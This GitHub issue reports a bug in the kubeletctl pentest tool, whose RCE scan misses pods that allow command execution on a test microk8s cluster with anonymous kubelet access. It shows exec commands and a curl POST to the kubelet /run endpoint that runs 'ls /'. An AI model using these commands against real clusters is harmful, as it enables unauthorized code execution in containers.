Scan RCE not working as intended
frankvoelker opened this issue · comments
frankvoelker commented
Summary
kubeletctl scan rce -s SERVER
is not showing "+" on RCE column even though I can RCE
Steps to Reproduce
- Setup microk8s cluster for testing
- allow anonymous Kubelet API access
- try to access https://SERVER:10250/pods to check for pods-json
- if you are allowed to see pods-json try to scan
kubeletctl scan rce -s SERVER
- also check if you can execute commands
Expected Results
if I am allowed to kubeletctl exec "ls /" -c CONTAINER -p POD -s SERVER
I should see a + in the "scan RCE" list
Actual Results
I have only "-" signs on kubeletctl scan rce -s SERVER
but I can execute code
┌───────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Node with pods vulnerable to RCE │
├───┬───────────┬─────────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤
│ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │
├───┼───────────┼─────────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ │ │ │ │ │ RUN │
├───┼───────────┼─────────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 1 │ 10.0.2.15 │ website-k8s-675dd9956d-qj58f │ default │ website-k8s │ - │
└───┴───────────┴─────────────────────────────────────────┴─────────────┴─────────────────────────┴─────┘
shows "-" on RCE column, but if I try to execute code I can do:
┌──(root@kali)-[/home/kali]
└─# kubeletctl exec "ls /" -p website-k8s-675dd9956d-qj58f -c website-k8s -s 10.0.2.15
bin dev home lib64 mnt proc run srv tmp var
boot etc lib media opt root sbin sys usr
I also saw in source code that there is POST request to check manually and this is my output:
┌──(root@kali)-[/home/kali]
└─# curl -k -XPOST https://10.0.2.15:10250/run/default/website-k8s-675dd9956d-qj58f/website-k8s -d "cmd=ls /"
rpc error: code = Unknown desc = failed to exec in container: failed to start exec "2766ae987637b8f679d7f68cbe02868c5dad0af36a08e8ed961825a274ac444d": OCI runtime exec failed: exec failed: unable to start container process: exec: "": executable file not found in $PATH: unknown
Reproducible
- Always
- Sometimes
- Non-Reproducible
Version/Tag number
Version 1.11
Environment setup
- Running in self-hosted Linux (Debian) VirtualBox and installed MicroK8S
- Which cloud provider? Which container orchestrator (including version)?
Eviatar Gerzi commented
Thank you, we will check it.
Eviatar Gerzi commented
We found the problem and fixed it. It will be updated in the next release.
For now, you can clone the current repository and build it.